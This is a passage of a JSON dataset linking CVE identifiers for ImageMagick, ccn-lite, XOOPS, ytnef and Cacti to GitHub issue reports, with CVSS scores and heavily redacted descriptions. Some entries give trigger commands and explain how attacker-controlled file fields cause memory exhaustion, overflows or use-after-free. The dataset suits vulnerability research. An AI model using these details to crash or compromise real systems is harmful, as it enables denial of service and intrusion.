  7001. "Issue_Created_At": "2017-07-30T07:34:09Z",
  7002. "description": "Null pointer Dereference in APITAG APITAG URL: FILETAG Version: APITAG NUMBERTAG Q NUMBERTAG Trigger Command: ./magick convert SEGV APITAG output.aai Crash Detail: ASAN:SIGSEGV APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG f1fd0f1cde7 bp NUMBERTAG ffdf NUMBERTAG ad5c0 sp NUMBERTAG ffdf NUMBERTAG ad NUMBERTAG T NUMBERTAG f1fd0f1cde6 in APITAG APITAG NUMBERTAG f1fd0f1f NUMBERTAG in APITAG APITAG NUMBERTAG f1fd0f NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f1fd0a NUMBERTAG cc in APITAG APITAG NUMBERTAG f1fd0a NUMBERTAG ed in APITAG APITAG NUMBERTAG f1fd NUMBERTAG de in APITAG APITAG NUMBERTAG f1fd NUMBERTAG bae in APITAG APITAG NUMBERTAG e9 in APITAG APITAG NUMBERTAG f1fcfcdba3f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info.",
  7003. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7004. "severity": "MEDIUM",
  7005. "baseScore": 6.5,
  7006. "impactScore": 3.6,
  7007. "exploitabilityScore": 2.8
  7008. },
  7009. {
  7010. "CVE_ID": "CVE-2017-11751",
  7011. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/631",
  7012. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/631",
  7013. "Repo_new": "imagemagick/imagemagick",
  7014. "Issue_Created_At": "2017-07-30T07:13:53Z",
  7015. "description": "Memory Leak in APITAG APITAG URL: FILETAG Trigger Command: ./magick convert Memory Leak NUMBERTAG output_picon NUMBERTAG APITAG APITAG NUMBERTAG Q NUMBERTAG Crash Detail: APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG d5a9aa in malloc ( PATHTAG NUMBERTAG f NUMBERTAG d5cb5 in APITAG APITAG",
  7016. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7017. "severity": "MEDIUM",
  7018. "baseScore": 6.5,
  7019. "impactScore": 3.6,
  7020. "exploitabilityScore": 2.8
  7021. },
  7022. {
  7023. "CVE_ID": "CVE-2017-11752",
  7024. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/628",
  7025. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/628",
  7026. "Repo_new": "imagemagick/imagemagick",
  7027. "Issue_Created_At": "2017-07-29T11:29:45Z",
  7028. "description": "Memory Leak in in APITAG APITAG Poc link : URLTAG Trigger Command\uff1a APITAG ERRORTAG",
  7029. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7030. "severity": "MEDIUM",
  7031. "baseScore": 6.5,
  7032. "impactScore": 3.6,
  7033. "exploitabilityScore": 2.8
  7034. },
  7035. {
  7036. "CVE_ID": "CVE-2017-11753",
  7037. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/629",
  7038. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/629",
  7039. "Repo_new": "imagemagick/imagemagick",
  7040. "Issue_Created_At": "2017-07-29T12:09:40Z",
  7041. "description": "Heap buffer overflow in APITAG APITAG Poc link: FILETAG Trigger Command\uff1a APITAG APITAG output: ERRORTAG",
  7042. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7043. "severity": "MEDIUM",
  7044. "baseScore": 6.5,
  7045. "impactScore": 3.6,
  7046. "exploitabilityScore": 2.8
  7047. },
  7048. {
  7049. "CVE_ID": "CVE-2017-11754",
  7050. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/633",
  7051. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/633",
  7052. "Repo_new": "imagemagick/imagemagick",
  7053. "Issue_Created_At": "2017-07-30T11:13:07Z",
  7054. "description": "Memory Leak in APITAG APITAG Poc link : FILETAG Trigger Command\uff1a APITAG ERRORTAG",
  7055. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7056. "severity": "MEDIUM",
  7057. "baseScore": 6.5,
  7058. "impactScore": 3.6,
  7059. "exploitabilityScore": 2.8
  7060. },
  7061. {
  7062. "CVE_ID": "CVE-2017-11755",
  7063. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/634",
  7064. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/634",
  7065. "Repo_new": "imagemagick/imagemagick",
  7066. "Issue_Created_At": "2017-07-30T11:17:53Z",
  7067. "description": "Memory Leak in APITAG APITAG Poc link : FILETAG Trigger Command\uff1a APITAG CODETAG",
  7068. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7069. "severity": "MEDIUM",
  7070. "baseScore": 6.5,
  7071. "impactScore": 3.6,
  7072. "exploitabilityScore": 2.8
  7073. },
  7074. {
  7075. "CVE_ID": "CVE-2017-12065",
  7076. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/877",
  7077. "Issue_Url_new": "https://github.com/cacti/cacti/issues/877",
  7078. "Repo_new": "cacti/cacti",
  7079. "Issue_Created_At": "2017-07-26T07:53:03Z",
  7080. "description": "some vulns found in.",
  7081. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  7082. "severity": "CRITICAL",
  7083. "baseScore": 9.8,
  7084. "impactScore": 5.9,
  7085. "exploitabilityScore": 3.9
  7086. },
  7087. {
  7088. "CVE_ID": "CVE-2017-12138",
  7089. "Issue_Url_old": "https://github.com/XOOPS/XoopsCore25/issues/523",
  7090. "Issue_Url_new": "https://github.com/xoops/xoopscore25/issues/523",
  7091. "Repo_new": "xoops/xoopscore25",
  7092. "Issue_Created_At": "2017-07-18T15:08:59Z",
  7093. "description": "url redirect vulnerability in xoops NUMBERTAG There is a url redirect vulnerability in PATHTAG line NUMBERTAG FILETAG When xoops_redirect is not a full https url, the defence will be bypassed. POC: FILETAG This will cause to redirect to yahoo as follow: FILETAG Discoverer: APITAG of Venustech",
  7094. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  7095. "severity": "MEDIUM",
  7096. "baseScore": 6.1,
  7097. "impactScore": 2.7,
  7098. "exploitabilityScore": 2.8
  7099. },
  7100. {
  7101. "CVE_ID": "CVE-2017-12139",
  7102. "Issue_Url_old": "https://github.com/XOOPS/XoopsCore25/issues/524",
  7103. "Issue_Url_new": "https://github.com/xoops/xoopscore25/issues/524",
  7104. "Repo_new": "xoops/xoopscore25",
  7105. "Issue_Created_At": "2017-07-18T15:19:15Z",
  7106. "description": "stored xss in XOOPS NUMBERTAG There is a stored xss in FILETAG . Here is the critical code: FILETAG After the file is uploaded, some information about the file will be writed to the database. image_mimetype with value from $uploader APITAG will be writed . FILETAG $uploader APITAG is finally from the",
  7107. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  7108. "severity": "MEDIUM",
  7109. "baseScore": 6.1,
  7110. "impactScore": 2.7,
  7111. "exploitabilityScore": 2.8
  7112. },
  7113. {
  7114. "CVE_ID": "CVE-2017-12140",
  7115. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/533",
  7116. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/533",
  7117. "Repo_new": "imagemagick/imagemagick",
  7118. "Issue_Created_At": "2017-06-29T14:36:38Z",
  7119. "description": "memory exhaustion in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG APITAG When identify DCM file , imagemagick will allocate memory to store the data. Here is the critical code: ERRORTAG length can be controlled as follow: ERRORTAG datum is int which is NUMBERTAG bit and signed type, quantum is size_t which is NUMBERTAG bit and unsigned type. datum is from file data, it is can be controlled, so can set datum value NUMBERTAG quantum value is a constant as it just can be PATHTAG So if datum is a negative number, it will be convert to a unsigned NUMBERTAG bit which is very large. So length can be controlled as very large to cause memory exhaustion . testcase: URLTAG Credit: APITAG of Venustech",
  7120. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7121. "severity": "MEDIUM",
  7122. "baseScore": 6.5,
  7123. "impactScore": 3.6,
  7124. "exploitabilityScore": 2.8
  7125. },
  7126. {
  7127. "CVE_ID": "CVE-2017-12141",
  7128. "Issue_Url_old": "https://github.com/Yeraze/ytnef/issues/50",
  7129. "Issue_Url_new": "https://github.com/yeraze/ytnef/issues/50",
  7130. "Repo_new": "yeraze/ytnef",
  7131. "Issue_Created_At": "2017-06-08T14:15:18Z",
  7132. "description": "heap buffer overflow in APITAG APITAG ). On Yerase TNEF Printer NUMBERTAG a heap buffer overflow was found in the function APITAG APITAG ). CODETAG testcase : URLTAG Credit : APITAG of Venustech",
  7133. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7134. "severity": "MEDIUM",
  7135. "baseScore": 5.5,
  7136. "impactScore": 3.6,
  7137. "exploitabilityScore": 1.8
  7138. },
  7139. {
  7140. "CVE_ID": "CVE-2017-12142",
  7141. "Issue_Url_old": "https://github.com/Yeraze/ytnef/issues/49",
  7142. "Issue_Url_new": "https://github.com/yeraze/ytnef/issues/49",
  7143. "Repo_new": "yeraze/ytnef",
  7144. "Issue_Created_At": "2017-06-08T14:13:52Z",
  7145. "description": "invalid memory read in APITAG On Yerase TNEF Printer NUMBERTAG an invalid memory read was found in the function APITAG ERRORTAG testcase: URLTAG Credit : APITAG of Venustech",
  7146. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7147. "severity": "MEDIUM",
  7148. "baseScore": 5.5,
  7149. "impactScore": 3.6,
  7150. "exploitabilityScore": 1.8
  7151. },
  7152. {
  7153. "CVE_ID": "CVE-2017-12144",
  7154. "Issue_Url_old": "https://github.com/Yeraze/ytnef/issues/51",
  7155. "Issue_Url_new": "https://github.com/yeraze/ytnef/issues/51",
  7156. "Repo_new": "yeraze/ytnef",
  7157. "Issue_Created_At": "2017-06-08T14:16:49Z",
  7158. "description": "allocation failed in APITAG On Yerase TNEF Printer NUMBERTAG a allocation failed was found in the function APITAG APITAG ). ERRORTAG testcase : URLTAG Credit : APITAG of Venustech",
  7159. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7160. "severity": "MEDIUM",
  7161. "baseScore": 5.5,
  7162. "impactScore": 3.6,
  7163. "exploitabilityScore": 1.8
  7164. },
  7165. {
  7166. "CVE_ID": "CVE-2017-12412",
  7167. "Issue_Url_old": "https://github.com/cn-uofbasel/ccn-lite/issues/128",
  7168. "Issue_Url_new": "https://github.com/cn-uofbasel/ccn-lite/issues/128",
  7169. "Repo_new": "cn-uofbasel/ccn-lite",
  7170. "Issue_Created_At": "2017-08-03T11:59:26Z",
  7171. "description": "FILETAG",
  7172. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  7173. "severity": "HIGH",
  7174. "baseScore": 7.8,
  7175. "impactScore": 5.9,
  7176. "exploitabilityScore": 1.8
  7177. },
  7178. {
  7179. "CVE_ID": "CVE-2017-12418",
  7180. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/643",
  7181. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/643",
  7182. "Repo_new": "imagemagick/imagemagick",
  7183. "Issue_Created_At": "2017-08-02T12:50:16Z",
  7184. "description": "Memory leak in APITAG APITAG Link : FILETAG Trigger Command : ./magick convert Memory Leak NUMBERTAG output_fp NUMBERTAG output.fpx Detail: ERRORTAG",
  7185. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  7186. "severity": "HIGH",
  7187. "baseScore": 7.5,
  7188. "impactScore": 3.6,
  7189. "exploitabilityScore": 3.9
  7190. },
  7191. {
  7192. "CVE_ID": "CVE-2017-12425",
  7193. "Issue_Url_old": "https://github.com/varnishcache/varnish-cache/issues/2379",
  7194. "Issue_Url_new": "https://github.com/varnishcache/varnish-cache/issues/2379",
  7195. "Repo_new": "varnishcache/varnish-cache",
  7196. "Issue_Created_At": "2017-07-31T08:10:57Z",
  7197. "description": "Placeholder issue please do not touch.",
  7198. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  7199. "severity": "HIGH",
  7200. "baseScore": 7.5,
  7201. "impactScore": 3.6,
  7202. "exploitabilityScore": 3.9
  7203. },
  7204. {
  7205. "CVE_ID": "CVE-2017-12427",
  7206. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/636",
  7207. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/636",
  7208. "Repo_new": "imagemagick/imagemagick",
  7209. "Issue_Created_At": "2017-07-31T12:54:49Z",
  7210. "description": "Memory leaks in APITAG poc_link: FILETAG Trigger Command\uff1a APITAG ERRORTAG",
  7211. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7212. "severity": "MEDIUM",
  7213. "baseScore": 6.5,
  7214. "impactScore": 3.6,
  7215. "exploitabilityScore": 2.8
  7216. },
  7217. {
  7218. "CVE_ID": "CVE-2017-12428",
  7219. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/544",
  7220. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/544",
  7221. "Repo_new": "imagemagick/imagemagick",
  7222. "Issue_Created_At": "2017-07-06T05:33:05Z",
  7223. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG The function\u00a0 APITAG in draw.c allows attackers to cause a denial of service (memory leak) via a crafted file. CODETAG testcase\uff1a URLTAG APITAG of Venustech",
  7224. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  7225. "severity": "HIGH",
  7226. "baseScore": 7.5,
  7227. "impactScore": 3.6,
  7228. "exploitabilityScore": 3.9
  7229. },
  7230. {
  7231. "CVE_ID": "CVE-2017-12429",
  7232. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/545",
  7233. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/545",
  7234. "Repo_new": "imagemagick/imagemagick",
  7235. "Issue_Created_At": "2017-07-06T08:25:31Z",
  7236. "description": "memory exhaustion in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG APITAG When identify MIFF file , imagemagick will allocate memory to store the data, here is the critical code: APITAG , in function APITAG ERRORTAG The \"colors\" can be obtained from local value \"options\" as follow, and the options is controlled by image , in other words the \u201ccolors\" can be read from input file. ERRORTAG The function APITAG convert string to unsigned long type, but the return value was not checked. Here is my FILETAG to limit memory usage,but NUMBERTAG MB limit can be bypassed. APITAG testcase: URLTAG Credit APITAG of Venustech",
  7237. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  7238. "severity": "HIGH",
  7239. "baseScore": 7.5,
  7240. "impactScore": 3.6,
  7241. "exploitabilityScore": 3.9
  7242. },
  7243. {
  7244. "CVE_ID": "CVE-2017-12430",
  7245. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/546",
  7246. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/546",
  7247. "Repo_new": "imagemagick/imagemagick",
  7248. "Issue_Created_At": "2017-07-06T08:47:57Z",
  7249. "description": "memory exhaustion in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG APITAG When identify MPC file , imagemagick will allocate memory to store the data, here is the critical code: APITAG , in function APITAG APITAG The \u201cimage >colors\" can be obtained from local value \u201coptions\u201d as follow, and the options is controlled by image , in other words the \u201cimage >colors\" can be read from input file. ERRORTAG The function APITAG convert string to unsigned long type, but the return value was not checked. Here is my FILETAG to limit memory usage,but NUMBERTAG MB limit can be bypassed. APITAG testcase: URLTAG Credit APITAG of Venustech",
  7250. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  7251. "severity": "HIGH",
  7252. "baseScore": 7.5,
  7253. "impactScore": 3.6,
  7254. "exploitabilityScore": 3.9
  7255. },
  7256. {
  7257. "CVE_ID": "CVE-2017-12431",
  7258. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/555",
  7259. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/555",
  7260. "Repo_new": "imagemagick/imagemagick",
  7261. "Issue_Created_At": "2017-07-09T10:38:14Z",
  7262. "description": "use after free in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG APITAG When identify WMF file , a crafted file revealed a use after free vulnerability. A piece of memory was allocated in in function APITAG APITAG Free:(api.c, in function wmf_lite_destory ) APITAG Use after free: (wmf.c, in function APITAG APITAG testcase: URLTAG Credit: APITAG of Venustech",
  7263. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7264. "severity": "MEDIUM",
  7265. "baseScore": 6.5,
  7266. "impactScore": 3.6,
  7267. "exploitabilityScore": 2.8
  7268. },
  7269. {
  7270. "CVE_ID": "CVE-2017-12432",
  7271. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/536",
  7272. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/536",
  7273. "Repo_new": "imagemagick/imagemagick",
  7274. "Issue_Created_At": "2017-07-04T14:29:43Z",
  7275. "description": "memory exhaustion in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG magick identify $FILE When identify PCX file , imagemagick will allocate memory to store the data. Here is the critical code: APITAG pcx_packets can be controlled as follow: APITAG APITAG can be read from input file ERRORTAG Here is my FILETAG to limit memory usage,but NUMBERTAG MB limit can be bypassed. APITAG testcase: URLTAG Creadit : APITAG of Venustech",
  7276. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7277. "severity": "MEDIUM",
  7278. "baseScore": 6.5,
  7279. "impactScore": 3.6,
  7280. "exploitabilityScore": 2.8
  7281. },
  7282. {
  7283. "CVE_ID": "CVE-2017-12433",
  7284. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/548",
  7285. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/548",
  7286. "Repo_new": "imagemagick/imagemagick",
  7287. "Issue_Created_At": "2017-07-07T08:25:15Z",
  7288. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG The function APITAG in memory.c allows attackers to cause a denial of service (memory leak) via a crafted file. CODETAG testcase: URLTAG Credit : APITAG of Venustech",
  7289. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7290. "severity": "MEDIUM",
  7291. "baseScore": 6.5,
  7292. "impactScore": 3.6,
  7293. "exploitabilityScore": 2.8
  7294. },
  7295. {
  7296. "CVE_ID": "CVE-2017-12434",
  7297. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/547",
  7298. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/547",
  7299. "Repo_new": "imagemagick/imagemagick",
  7300. "Issue_Created_At": "2017-07-06T11:50:17Z",
  7301. "description": "assertion failed in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG A crafted file revealed an assertion failure in image.c. CODETAG testcase \uff1a URLTAG Credit \uff1a APITAG of Venustech",
  7302. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7303. "severity": "MEDIUM",
  7304. "baseScore": 6.5,
  7305. "impactScore": 3.6,
  7306. "exploitabilityScore": 2.8
  7307. },
  7308. {
  7309. "CVE_ID": "CVE-2017-12435",
  7310. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/543",
  7311. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/543",
  7312. "Repo_new": "imagemagick/imagemagick",
  7313. "Issue_Created_At": "2017-07-05T16:49:29Z",
  7314. "description": "memory exhaustion in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG magick identify $FILE When identify SUN file , imagemagick will allocate memory to store the data, here is the critical code: sun.c , in function APITAG ERRORTAG colormap.c , in function APITAG APITAG memory.c in function APITAG size_t count,const size_t quantum): APITAG APITAG is the same to malloc. image >colors can be controlled by struct APITAG value \"sun_info\", and sun_info is read from APITAG as follow, in other words image >colors can be read from input file. CODETAG Here is my FILETAG to limit memory usage,but NUMBERTAG MB limit can be bypassed. APITAG testcase: URLTAG Credit: APITAG of Venustech",
  7315. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  7316. "severity": "HIGH",
  7317. "baseScore": 7.5,
  7318. "impactScore": 3.6,
  7319. "exploitabilityScore": 3.9
  7320. },
  7321. {
  7322. "CVE_ID": "CVE-2017-12463",
  7323. "Issue_Url_old": "https://github.com/cn-uofbasel/ccn-lite/issues/129",
  7324. "Issue_Url_new": "https://github.com/cn-uofbasel/ccn-lite/issues/129",
  7325. "Repo_new": "cn-uofbasel/ccn-lite",
  7326. "Issue_Created_At": "2017-08-07T18:01:55Z",
  7327. "description": "[ CVETAG ] ccnl APITAG Memory Leak. struct envelope_s env leaks memory, if packet format is unknown.",
  7328. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  7329. "severity": "HIGH",
  7330. "baseScore": 7.5,
  7331. "impactScore": 3.6,
  7332. "exploitabilityScore": 3.9
  7333. },
  7334. {
  7335. "CVE_ID": "CVE-2017-12464",
  7336. "Issue_Url_old": "https://github.com/cn-uofbasel/ccn-lite/issues/130",
  7337. "Issue_Url_new": "https://github.com/cn-uofbasel/ccn-lite/issues/130",
  7338. "Repo_new": "cn-uofbasel/ccn-lite",
  7339. "Issue_Created_At": "2017-08-07T18:03:51Z",
  7340. "description": "[ CVETAG ] A NULL pointer deref in ccn lite valid.c. A NULL pointer deref in ccn lite valid.c keys = load_keys_from_file(keyfile); keyfile might be NULL, when not specified on the cmdline",
  7341. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  7342. "severity": "HIGH",
  7343. "baseScore": 7.5,
  7344. "impactScore": 3.6,
  7345. "exploitabilityScore": 3.9
  7346. },
  7347. {
  7348. "CVE_ID": "CVE-2017-12465",
  7349. "Issue_Url_old": "https://github.com/cn-uofbasel/ccn-lite/issues/131",
  7350. "Issue_Url_new": "https://github.com/cn-uofbasel/ccn-lite/issues/131",
  7351. "Repo_new": "cn-uofbasel/ccn-lite",
  7352. "Issue_Created_At": "2017-08-07T18:08:47Z",
  7353. "description": "APITAG CVETAG ] iottlv_parse_sequence and localrpc_parse: integer overflow. int localrpc_parse(int lev, unsigned char base, unsigned char buf, int len, int rawxml, FILE out) { int typ, vallen, i; unsigned char cp; the typ, vallen and i want to be unsigned as well, otherwise the APITAG in the LRPC_FLATNAME will run amok APITAG iottlv_parse_sequence(int lev, unsigned char ctx, unsigned char base, unsigned char buf, int len, char cur_tag, int rawxml, FILE out) { int i, vallen; vallen wants to be unsigned, better size_t ...",
  7354. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  7355. "severity": "CRITICAL",
  7356. "baseScore": 9.8,
  7357. "impactScore": 5.9,
  7358. "exploitabilityScore": 3.9
  7359. },
  7360. {
  7361. "CVE_ID": "CVE-2017-12466",
  7362. "Issue_Url_old": "https://github.com/cn-uofbasel/ccn-lite/issues/132",
  7363. "Issue_Url_new": "https://github.com/cn-uofbasel/ccn-lite/issues/132",
  7364. "Repo_new": "cn-uofbasel/ccn-lite",
  7365. "Issue_Created_At": "2017-08-07T18:21:29Z",
  7366. "description": "[ CVETAG ] ssl_halen is NUMBERTAG for me, when running ccn lite simu which causes an out of bounds NUMBERTAG b NUMBERTAG in ll2ascii PATHTAG NUMBERTAG b NUMBERTAG in ccnl_addr2ascii PATHTAG NUMBERTAG bce NUMBERTAG in ccnl_get_face_or_create PATHTAG NUMBERTAG f NUMBERTAG in ccnl_simu_add_fwd PATHTAG NUMBERTAG f2fc8 in ccnl_simu_init PATHTAG NUMBERTAG dfa in ccnl_simu_init PATHTAG NUMBERTAG dfa in main PATHTAG NUMBERTAG f6d NUMBERTAG in __libc_start_main ( PATHTAG NUMBERTAG a NUMBERTAG PATHTAG )",
  7367. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  7368. "severity": "CRITICAL",
  7369. "baseScore": 9.8,
  7370. "impactScore": 5.9,
  7371. "exploitabilityScore": 3.9
  7372. },
  7373. {
  7374. "CVE_ID": "CVE-2017-12467",
  7375. "Issue_Url_old": "https://github.com/cn-uofbasel/ccn-lite/issues/133",
  7376. "Issue_Url_new": "https://github.com/cn-uofbasel/ccn-lite/issues/133",
  7377. "Repo_new": "cn-uofbasel/ccn-lite",
  7378. "Issue_Created_At": "2017-08-07T18:24:06Z",
  7379. "description": "[ CVETAG ] memory leak. p >comp = (unsigned char ) APITAG sizeof(unsigned char )); p >complen = (int ) APITAG sizeof(int)); if (!p >comp || !p >complen) return NULL; when one of the allocations fails, the memory for the other variable leaks",
  7380. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  7381. "severity": "HIGH",
  7382. "baseScore": 7.5,
  7383. "impactScore": 3.6,
  7384. "exploitabilityScore": 3.9
  7385. },
  7386. {
  7387. "CVE_ID": "CVE-2017-12468",
  7388. "Issue_Url_old": "https://github.com/cn-uofbasel/ccn-lite/issues/134",
  7389. "Issue_Url_new": "https://github.com/cn-uofbasel/ccn-lite/issues/134",
  7390. "Repo_new": "cn-uofbasel/ccn-lite",
  7391. "Issue_Created_At": "2017-08-07T18:30:38Z",
  7392. "description": "[ CVETAG ] ccn lite ccnb2xml.c: Buffer Overflow. oid print_blob(unsigned char buf, int len, int typ, int num, int offset, bool APITAG { int vallen; unsigned char valptr; if APITAG print_tag(offset, typ, num, true, false); ccnl_ccnb_consume(typ, num, buf, len, &valptr, &vallen); if (vallen > len) { return; } vallen > len is not checked",
  7393. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  7394. "severity": "CRITICAL",
  7395. "baseScore": 9.8,
  7396. "impactScore": 5.9,
  7397. "exploitabilityScore": 3.9
  7398. },
  7399. {
  7400. "CVE_ID": "CVE-2017-12469",
  7401. "Issue_Url_old": "https://github.com/cn-uofbasel/ccn-lite/issues/135",
  7402. "Issue_Url_new": "https://github.com/cn-uofbasel/ccn-lite/issues/135",
  7403. "Repo_new": "cn-uofbasel/ccn-lite",
  7404. "Issue_Created_At": "2017-08-07T18:33:21Z",
  7405. "description": "[ CVETAG ] util/ccnl common.c: write in unallocated memory. util/ccnl common.c: if (key && keylen NUMBERTAG struct key_s k = (struct key_s ) calloc NUMBERTAG sizeof(struct key_s )); the APITAG only allocates the size for a pointer, not for the entire struct, causing writes to unallocated memory",
  7406. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  7407. "severity": "CRITICAL",
  7408. "baseScore": 9.8,
  7409. "impactScore": 5.9,
  7410. "exploitabilityScore": 3.9
  7411. },
  7412. {
  7413. "CVE_ID": "CVE-2017-12470",
  7414. "Issue_Url_old": "https://github.com/cn-uofbasel/ccn-lite/issues/136",
  7415. "Issue_Url_new": "https://github.com/cn-uofbasel/ccn-lite/issues/136",
  7416. "Repo_new": "cn-uofbasel/ccn-lite",
  7417. "Issue_Created_At": "2017-08-07T18:36:20Z",
  7418. "description": "[ CVETAG ] ndn_parse_sequence: integer overflow. static int ndn_parse_sequence(int lev, unsigned char base, unsigned char buf, int len, char cur_tag, int rawxml, FILE out) { int i, maxi, vallen; int typ; typ should be unsigned, otherwise the check below fails: if (typ < NDN_TLV_MAX_TYPE && ndntlv_recurse[typ]) { len = vallen; vallen wants to be unsigned as well, or better size_t",
  7419. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  7420. "severity": "CRITICAL",
  7421. "baseScore": 9.8,
  7422. "impactScore": 5.9,
  7423. "exploitabilityScore": 3.9
  7424. },
  7425. {
  7426. "CVE_ID": "CVE-2017-12471",
  7427. "Issue_Url_old": "https://github.com/cn-uofbasel/ccn-lite/issues/137",
  7428. "Issue_Url_new": "https://github.com/cn-uofbasel/ccn-lite/issues/137",
  7429. "Repo_new": "cn-uofbasel/ccn-lite",
  7430. "Issue_Created_At": "2017-08-07T18:41:36Z",
  7431. "description": "[ CVETAG ] ccn lite pktdump. APITAG does not check for out of bounds conditions, causing an invalid read in APITAG while APITAG base, buf, len, &num, &typ, rawxml, out NUMBERTAG if (num > len) return NUMBERTAG",
  7432. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  7433. "severity": "CRITICAL",
  7434. "baseScore": 9.8,
  7435. "impactScore": 5.9,
  7436. "exploitabilityScore": 3.9
  7437. },
  7438. {
  7439. "CVE_ID": "CVE-2017-12472",
  7440. "Issue_Url_old": "https://github.com/cn-uofbasel/ccn-lite/issues/138",
